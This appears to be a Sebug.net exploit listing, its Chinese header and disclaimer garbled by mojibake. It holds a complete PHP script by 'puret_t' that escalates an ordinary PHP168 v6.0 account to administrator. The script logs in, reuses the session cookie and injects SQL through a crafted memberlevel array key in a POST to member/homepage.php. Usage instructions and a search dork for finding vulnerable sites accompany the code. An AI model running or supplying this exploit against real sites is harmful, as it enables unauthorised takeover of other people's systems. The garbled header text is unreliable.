Php168 v6 Ȩ©

Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.#!/usr/bin/php2.<?php3. 4.print_r('5.+---------------------------------------------------------------------------+6.Php168 v6.0 update user access exploit7.by puret_t8.mail: puretot at gmail dot com9.team: http://www.wolvez.org10.dork: "Powered by PHP168 V6.0"11.+---------------------------------------------------------------------------+12.');13./**14. * works regardless of php.ini settings15. */16.if ($argc < 5) {17.    print_r('18.+---------------------------------------------------------------------------+19.Usage: php '.$argv[0].' host path user pass20.host:      target server (ip/hostname)21.path:      path to php16822.user:      login username23.pass:      login password24.Example:25.php '.$argv[0].' localhost /php168/ ryat 12345626.+---------------------------------------------------------------------------+27.');28.    exit;29.}30. 31.error_reporting(7);32.ini_set('max_execution_time', 0);33. 34.$host = $argv[1];35.$path = $argv[2];36.$user = $argv[3];37.$pass = $argv[4];38. 39.$resp = send();40.preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);41. 42.if ($cookie)43.    if (strpos(send(), 'puret_t') !== false)44.        exit("Expoilt Success!\nYou Are Admin Now!\n");45.    else 46.        exit("Exploit Failed!\n");47.else48.    exit("Exploit Failed!\n");49.    50.function rands($length = 8)51.{52.    $hash = '';53.    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';54.    $max = strlen($chars) - 1;55.    mt_srand((double)microtime() * 1000000);56.    for ($i = 0; $i < $length; $i++)57.        $hash .= $chars[mt_rand(0, $max)];58. 59.    return $hash;60.}61. 62.function send()63.{64.    global $host, $path, $user, $pass, $cookie;65.    66.    if ($cookie) {67.        $cookie[1] .= ';USR='.rands()."\t31\t\t";68.        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';69.    70.        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";71.        $message .= "Accept: */*\r\n";72.        $message .= "Accept-Language: zh-cn\r\n";73.        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";74.        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";75.        $message .= "Host: $host\r\n";76.        $message .= "Content-Length: ".strlen($cmd)."\r\n";77.        $message .= "Connection: Close\r\n";78.        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";79.        $message .= $cmd;80.    } else {81.        $cmd = "username=$user&password=$pass&step=2";82.        83.        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";84.        $message .= "Accept: */*\r\n";85.        $message .= "Accept-Language: zh-cn\r\n";86.        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";87.        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";88.        $message .= "Host: $host\r\n";89.        $message .= "Content-Length: ".strlen($cmd)."\r\n";90.        $message .= "Connection: Close\r\n\r\n";91.        $message .= $cmd;92.    }93.    94.    $fp = fsockopen($host, 80);95.    fputs($fp, $message);96.    97.    $resp = '';98. 99.    while ($fp && !feof($fp))100.        $resp .= fread($fp, 1024);101.    102.    return $resp;103.}104. 105.?>